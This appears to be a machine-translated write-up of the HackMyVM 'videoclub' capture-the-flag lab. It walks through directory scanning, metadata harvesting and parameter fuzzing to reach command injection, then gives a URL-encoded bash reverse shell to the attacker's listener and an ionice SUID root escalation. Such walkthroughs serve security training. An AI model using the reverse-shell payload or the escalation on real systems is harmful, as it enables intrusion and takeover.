Hackmyvm target series (6) -videoclub

One 、 information gathering

Because it's the campus network , Too many hosts , I'll search keywords directly to find the target machine .

nmap -sP 192.168.200.0/24 | grep -i -B 2 virtualbox

Use nmap Port scan , Detect the open port of the target . Pictured , It's open ssh Service and HTTP service .

nmap -sV -sC -p- -sT 192.168.200.161

visit 3377 port .

Seeing this above, I thought it was a cms, Use whatweb Fingerprint identification .

whatweb http://192.168.200.161:3377

But I didn't recognize what it was cms.

Then scan the directory first .

gobuster dir -u http://192.168.200.161:3377 -w directory-list-2.3-medium.txt -x php,html,txt,7z,zip,bak,gz

Many things have been found , Visit one by one .

Found a directory traversal , It's full of pictures .

video

apache User manual

visit robots.txt, A long string of characters is found below , At first I thought it was base64 Encrypted , But after decryption, the code was garbled .

robots.txt There is also a file hidden at the bottom of the page .

visit list-defaulters.txt file , The following things . But at the beginning, I really didn't see why . But watch a wave carefully , I found that there was something wrong with the combination of the things I circled below .

The little friend who has read my previous article should already know exiftool What is it ,

ExifTool from Phil Harvey Development , It's free of charge 、 Cross platform open source software , For reading, writing and processing images （ The main ）、 Audio and video and PDF Metadata of files such as （metadata）.

steg hide, It should mean that there are hidden attributes ？

Two 、 Exploit

Use exiftool Read the metadata of the picture ,hackers.jpg This picture is the most suspicious , Let's first look at the properties of this picture

As shown in the figure , At a glance, I found this character very suspicious , Then see if other pictures and videos exist Copyright Attribute .

Wrote a python Script , All the pictures of the target are crawled down .

When crawling the video, you just need to images Change to videos that will do .

import requests
from bs4 import BeautifulSoup


re = requests.get('http://192.168.200.161:3377/images/')
soup = BeautifulSoup(re.text,'lxml')
a = soup.find_all('a')
link = list(map(lambda x:'http://192.168.200.161:3377/images/'+x['href'],a))
img_url = list(filter(lambda x:'?' not in x,link))
img_url.remove('http://192.168.200.161:3377/images//')
for url in img_url:
    print(url)
    r = requests.get(url).content
    with open(url.split('/')[-1],'wb') as f:
        f.write(r)

Final , The following information is collected in all pictures and videos .

img：
zerial_killer:bien_cabron


video
LostDVD:k1nd3rs
LostDVD=t3rm1n4t0r
LostDVD=m14_w4ll4c3
LostDVD=c0n3h34ds
secret_film:c0ntr0l

At first I thought these were accounts and passwords , Just log in one by one . But not surprisingly, they all failed .

Then compare these things with the above list-defaulters.txt Combine the files into a dictionary , As shown in the figure below .

Use dirsearch Do a directory scan , Specify the dictionary we just generated .

dirsearch -u "http://192.168.200.161:3377/" -t 50 -e php,htmp,txt,7z,zip,gz,bak -x404,500,599 -w /home/kali/Desktop/video/dict.txt

The scan results are as follows .

In the use of gobuster Do a wave of directory scanning .

gobuster dir -u "http://192.168.200.161:3377/" -t 30 -x php,htmp,txt,7z,zip,gz,bak -w dict.txt

The scan results are as follows , Than dirsearch One more. c0ntr0l.php file .

I really took this result , It's all a dictionary dirsearch As a result, one is missing , This step stuck with me for a long time , In the future, the directory scanning will be directly scanned by two scanners .

Visit all the results one by one , Other content is either video or pictures , No value .

Only c0ntr0l.php The contents of the document are blank . I feel like a play ！

http://192.168.200.161:3377/c0ntr0l.php

This request does not seem to pass in parameters , That use wfuzz Do a fuzzy test , See if there's a surprise .

The dictionary should also be set as what we collected before ！

wfuzz -c --hc=404 -t 500 -w dict.txt http://192.168.200.161:3377/c0ntr0l.php?FUZZ=id

give the result as follows , Find out flynn Parameters can make the result different from others .

visit http://192.168.200.161:3377/c0ntr0l.php?flynn=id

？？ You can actually execute orders here . Isn't that a direct rebound shell？

stay kali On the monitor 6666 port

And then use hackbar visit

http://192.168.200.161:3377/c0ntr0l.php?f1ynn=bash%20-c%20'bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F192.168.200.192%2F6666%200%3E%261'

Look again kali here , Successful rebound shell, But permission is only one web jurisdiction

3、 ... and 、 Elevated privileges

Check it out. /home Catalog , Found two directories . and secret_film The catalogue looks a little familiar , Look at the pictures we collected above 、 Video information , Don't you just include this ？ Take it to login .

Uh ..... Login failed , There seems to be something wrong . This secret_film How is the owner of the directory root ah

Check it out. /etc/passwd, I'm impressed , There is no such thing as secret_film This user , This pit is really many ！

librarian The user's home directory is readable and accessible by any user

Look at what's in the catalogue ？

Find out flag, And this flag Any user can read directly , Get the first one flag.

Here we also find one with s Executable file with permissions , And the owner is root, Is it possible that there is suid The possibility of raising rights ？

Execute the following command , The query has suid Permission file .

find / -perm -u=s -type f 2>/dev/null

Be careful not to enter directly when performing the lifting operation

ionice /bin/sh -p, Otherwise, it will be like me , Get permission or www-data 了 . adopt which ionice, Find out ionice The command points to /usr/bin/ionice Of , This file does not have s The powers of the .

You need to enter the absolute path to successfully raise the right .

/home/librarian/ionice /bin/bash -p

Switch to /root Catalog , Did you find it root.txt, But there is one note-for-new-administrator file . Read file contents , Prompt us root.txt The file has changed places .

Use find Command direct search root.txt file

find / -name root.txt